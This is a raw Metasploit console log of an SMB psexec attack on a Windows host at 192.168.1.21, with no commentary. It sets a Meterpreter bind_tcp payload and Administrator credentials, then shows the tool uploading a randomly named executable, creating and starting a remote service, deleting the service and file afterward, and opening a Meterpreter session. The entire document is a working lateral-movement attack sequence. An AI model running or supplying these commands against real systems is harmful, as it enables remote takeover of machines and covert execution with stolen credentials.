- use exploit/windows/smb/psexec
- exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
- PAYLOAD => windows/meterpreter/bind_tcp
- exploit(psexec) > set DCERPC::fake_bind_multi false
- DCERPC::fake_bind_multi => false
- exploit(psexec) > set LPORT 4445
- LPORT => 4445
- exploit(psexec) > set RHOST 192.168.1.21
- RHOST => 192.168.1.21
- exploit(psexec) > set SMBPass password
- SMBPass => password
- exploit(psexec) > set SMBUser Administrator
- SMBUser => Administrator
- exploit(psexec) > exploit
- [*] Connecting to the server...
- [*] Started bind handler
- [*] Authenticating to 192.168.1.21:445|WORKGROUP as user 'Administrator'...
- [*] Uploading payload...
- [*] Created \QDauyXip.exe...
- [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.21[\svcctl] ...
- [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.21[\svcctl] ...
- [*] Obtaining a service manager handle...
- [*] Creating a new service (urVJxdlg - "MXGqFoBD")...
- [*] Closing service handle...
- [*] Opening service...
- [*] Starting the service...
- [*] Removing the service...
- [*] Closing service handle...
- [*] Deleting \QDauyXip.exe...
- [*] Sending stage (752128 bytes) to 192.168.1.21
- [*] Meterpreter session 3 opened (192.168.1.11:41106 -> 192.168.1.21:4445) at 2011-07-22 20:30:14 -0500